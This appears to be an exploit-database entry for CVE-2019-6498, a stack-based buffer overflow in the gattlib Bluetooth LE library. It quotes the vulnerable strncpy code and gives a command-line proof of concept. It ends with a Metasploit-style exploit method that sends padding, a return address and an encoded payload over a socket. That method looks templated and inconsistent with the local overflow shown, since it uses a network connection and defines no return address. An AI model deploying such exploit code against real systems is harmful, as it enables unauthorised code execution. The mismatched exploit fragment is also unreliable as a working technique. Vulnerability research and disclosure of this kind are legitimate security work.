60 lines
No EOL
1.5 KiB
Ruby
Executable file
60 lines
No EOL
1.5 KiB
Ruby
Executable file
Exploit Title: stack-based overflow
|
|
# Date: 2019-11-21
|
|
# Exploit Author: Dhiraj Mishra
|
|
# Vendor Homepage: http://labapart.com/
|
|
# Software Link: https://github.com/labapart/gattlib/issues/81
|
|
# Version: 0.2
|
|
# Tested on: Linux 4.15.0-38-generic
|
|
# CVE: CVE-2019-6498
|
|
# References:
|
|
# https://github.com/labapart/gattlib/issues/81
|
|
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6498
|
|
|
|
## Summary:
|
|
While fuzzing gattlib (Gattlib is a library to access GATT information from
|
|
BLE (Bluetooth Low Energy) devices) using clang 6.0 with ASAN a stack-based
|
|
buffer-overflow was observed.
|
|
|
|
## Vulnerable code from gattlib.c
|
|
// Transform string from 'DA:94:40:95:E0:87' to 'dev_DA_94_40_95_E0_87'
|
|
strncpy(device_address_str, dst, sizeof(device_address_str));
|
|
for (i = 0; i < strlen(device_address_str); i++) {
|
|
if (device_address_str[i] == ':') {
|
|
device_address_str[i] = '_';
|
|
}
|
|
}
|
|
|
|
## Vulnerable code from discover.c
|
|
if (argc != 2) {
|
|
printf("%s <device_address>\n", argv[0]);
|
|
return 1;
|
|
}
|
|
|
|
connection = gattlib_connect(NULL, argv[1], BDADDR_LE_PUBLIC, BT_SEC_LOW,
|
|
0, 0);
|
|
if (connection == NULL) {
|
|
fprintf(stderr, "Fail to connect to the bluetooth device.\n");
|
|
return 1;
|
|
}
|
|
|
|
## PoC
|
|
|
|
./discover `python -c 'print "A"*20'`
|
|
|
|
## MSF code
|
|
|
|
def exploit
|
|
connect
|
|
|
|
print_status("Sending #{payload.encoded.length} byte payload...")
|
|
|
|
# Building the buffer for transmission
|
|
buf = "A" * 20
|
|
buf += [ target.ret ].pack('V')
|
|
buf += payload.encoded
|
|
|
|
sock.put(buf)
|
|
sock.get
|
|
|
|
handler
|
|
end |